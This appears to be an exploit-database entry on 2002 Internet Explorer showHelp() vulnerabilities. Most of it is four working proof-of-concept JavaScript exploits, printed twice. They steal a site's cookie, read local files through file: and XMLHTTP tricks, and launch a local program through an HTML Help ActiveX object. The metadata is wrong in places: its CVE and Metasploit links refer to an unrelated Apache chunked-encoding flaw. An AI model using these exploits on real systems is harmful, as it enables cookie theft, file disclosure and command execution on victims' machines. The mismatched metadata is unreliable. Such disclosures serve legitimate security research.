Microsoft Internet Explorer showHelp() Function Multiple Vulnerabilities

vendor:

Internet Explorer

by:

Sandblad

7.5

CVSS

HIGH

Multiple Vulnerabilities

CWE

Product Name: Internet Explorer

Affected Version From: Microsoft Internet Explorer 5.0

Affected Version To: Microsoft Internet Explorer 6.0

Patch Exists: YES

Related CWE: CVE-2002-0392

CPE: a:microsoft:internet_explorer

Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2002-0392/, https://www.rapid7.com/db/vulnerabilities/http-apache2-chunked-transfer-int-bof/, https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-apache-chunked-encoding-vulnerability-cve-2002-0392/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2002

Microsoft Internet Explorer showHelp() Function Multiple Vulnerabilities

Microsoft Internet Explorer implements the showHelp() function as a means of displaying help content contained in HTML pages. However, this function is capable of performing too many other actions outside of its intended functionality through pluggable protocols. These actions could include reading files and executing commands on the vulnerable system. Exploit 1: // Sandblad advisory #11 - Read your google cookie showHelp("file:");showHelp("http://www.google.com/"); showHelp("javascript:alert(document.cookie)"); Exploit 2: // Sandblad advisory #11 - Read the file c:test.txt showHelp("file:");showHelp("res://shdoclc.dll/about.dlg"); showHelp("javascript:try{c=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){c=new ActiveXObject('Microsoft.XMLHTTP')};c.open('GET','file://c:/test.txt',false);c.send(null);alert(c.responseText)"); Exploit 3: // Sandblad advisory #11 - Read the file c:test.txt showHelp("file:");showHelp("file://c:/test.txt"); showHelp("javascript:alert(document.body.innerText)"); Exploit 4: // Sandblad advisory #11 - Run the very nice game Winmine showHelp("file:");showHelp("iexplore.chm");showHelp("res:"); showHelp("javascript:location='mk:@MSITStore:C:'"); showHelp("javascript:document.write('<object id=c classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\u003E<param name=Command value=ShortCut\u003E<param name=Item1 value=,winmine,\u003E</object\u003E');c.Click();");

Mitigation:

Microsoft has released a patch to address this issue. Users are advised to apply the appropriate patch.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6780/info

Microsoft Internet Explorer implements the showHelp() function as a means of displaying help content contained in HTML pages. However, this function is capable of performing too many other actions outside of its intended functionality through pluggable protocols. These actions could include reading files and executing commands on the vulnerable system.

Exploit 1:

// Sandblad advisory #11 - Read your google cookie
showHelp("file:");showHelp("http://www.google.com/");
showHelp("javascript:alert(document.cookie)");

Exploit 2:

// Sandblad advisory #11 - Read the file c:\test.txt
showHelp("file:");showHelp("res://shdoclc.dll/about.dlg");
showHelp("javascript:try{c=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){c=new ActiveXObject('Microsoft.XMLHTTP')};c.open('GET','file://c:/test.txt',false);c.send(null);alert(c.responseText)");

Exploit 3:

// Sandblad advisory #11 - Read the file c:\test.txt
showHelp("file:");showHelp("file://c:/test.txt");
showHelp("javascript:alert(document.body.innerText)");

Exploit 4:

// Sandblad advisory #11 - Run the very nice game Winmine
showHelp("file:");showHelp("iexplore.chm");showHelp("res:");
showHelp("javascript:location='mk:@MSITStore:C:'");
showHelp("javascript:document.write('<object id=c classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\\u003E<param name=Command value=ShortCut\\u003E\<param name=Item1 value=,winmine,\\u003E</object\\u003E');c.Click();");